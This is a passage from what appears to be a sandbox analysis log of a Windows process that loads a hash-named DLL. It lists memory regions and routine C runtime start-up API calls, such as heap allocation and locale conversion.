0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 18026 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 18027 start_va = 0x7ff626f50000 end_va = 0x7ff626f77fff monitored = 1 entry_point = 0x7ff626f51e8c region_type = mapped_file name = "giumlol.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe") Region: id = 18028 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 18100 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 18101 start_va = 0x7ffc5bfa0000 end_va = 0x7ffc5c187fff monitored = 0 entry_point = 0x7ffc5bfcba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 18102 start_va = 0x7ffc5ecd0000 end_va = 0x7ffc5ed7cfff monitored = 0 entry_point = 0x7ffc5ece81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 18103 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 18104 start_va = 0x7ff5ffed0000 end_va = 0x7ff5fffcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5ffed0000" filename = "" Region: id = 18105 start_va = 0x540000 end_va = 0x5fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 18106 start_va = 0x7ffc5e960000 end_va = 0x7ffc5eab5fff monitored = 0 entry_point = 0x7ffc5e96a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 18176 start_va = 0x7ffc5f540000 end_va = 0x7ffc5f6c5fff monitored = 0 entry_point = 0x7ffc5f58ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 18177 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 18178 start_va = 0x7ffc5cc80000 end_va = 0x7ffc5e1defff monitored = 0 entry_point = 0x7ffc5cde11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 18179 start_va = 0x7ffc5e850000 end_va = 0x7ffc5e8ecfff monitored = 0 entry_point = 0x7ffc5e8578a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 18180 start_va = 0x7ffc5bec0000 end_va = 0x7ffc5bf02fff monitored = 0 entry_point = 0x7ffc5bed4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 18181 start_va = 0x7ffc5c3c0000 end_va = 0x7ffc5ca03fff monitored = 0 entry_point = 0x7ffc5c5864b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 18182 start_va = 0x7ffc5f2c0000 end_va = 0x7ffc5f53cfff monitored = 0 entry_point = 0x7ffc5f394970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 18183 start_va = 0x7ffc5e2b0000 end_va = 0x7ffc5e3cbfff monitored = 0 entry_point = 0x7ffc5e2f02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 18184 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 18185 start_va = 0x7ffc5cac0000 end_va = 0x7ffc5cb29fff monitored = 0 entry_point = 0x7ffc5caf6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 18271 start_va = 0x7ffc5ec20000 end_va = 0x7ffc5ecc6fff monitored = 0 entry_point = 0x7ffc5ec358d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 18272 start_va = 0x7ffc5e8f0000 end_va = 0x7ffc5e94afff monitored = 0 entry_point = 0x7ffc5e9038b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 18273 start_va = 0x7ffc5e7b0000 end_va = 0x7ffc5e801fff monitored = 0 entry_point = 0x7ffc5e7bf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 18274 start_va = 0x7ffc5be50000 end_va = 0x7ffc5be5efff monitored = 0 entry_point = 0x7ffc5be53210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 18275 start_va = 0x7ffc5cb50000 end_va = 0x7ffc5cc04fff monitored = 0 entry_point = 0x7ffc5cb922e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 18276 start_va = 0x7ffc5be70000 end_va = 0x7ffc5bebafff monitored = 0 entry_point = 0x7ffc5be735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 18277 start_va = 0x7ffc5be30000 end_va = 0x7ffc5be43fff monitored = 0 entry_point = 0x7ffc5be352e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 18278 start_va = 0x7ffc5e3e0000 end_va = 0x7ffc5e522fff monitored = 0 entry_point = 0x7ffc5e408210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 18279 start_va = 0x180000 end_va = 0x1b8fff monitored = 0 entry_point = 0x1812f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18280 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 18281 start_va = 0x7ffc5e810000 end_va = 0x7ffc5e84afff monitored = 0 entry_point = 0x7ffc5e8112f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 18282 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 18283 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 18359 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 18360 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 18361 start_va = 0x1e20000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 18362 start_va = 0x1a0000 end_va = 0x1a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 18437 start_va = 0x1ee0000 end_va = 0x1f9ffff monitored = 0 entry_point = 0x1f00da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 18438 start_va = 0x7ffc45e90000 end_va = 0x7ffc45fd6fff monitored = 1 entry_point = 0x7ffc45f67cec region_type = mapped_file name = "8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" filename = "\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") Region: id = 18610 start_va = 0x1ee0000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 18611 start_va = 0x1fe0000 end_va = 0x21dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 18612 start_va = 0x21e0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Thread: id = 236 os_tid = 0x12d4 [0294.609] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.609] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0294.609] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.609] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0294.610] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0294.610] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.611] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0294.613] GetProcessHeap () returned 0x440000 [0294.613] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.613] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0294.613] GetLastError () returned 0x7e [0294.613] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0294.614] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0294.614] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x3c8) returned 0x44c2f0 [0294.614] SetLastError (dwErrCode=0x7e) [0294.614] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x1200) returned 0x453480 [0294.616] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0294.616] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0294.616] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0294.616] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0294.616] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free" [0294.616] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_image_data_free" [0294.616] GetACP () returned 0x4e4 [0294.616] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x228) returned 0x444f20 [0294.617] IsValidCodePage (CodePage=0x4e4) returned 1 [0294.617] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0294.617] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0294.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0294.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0294.617] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0294.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0294.617] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0294.617] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0294.617] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0294.618] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0294.618] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0294.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0294.618] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0294.618] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0294.618] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0294.618] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0294.618] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0294.618] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x100) returned 0x452d30 [0294.618] 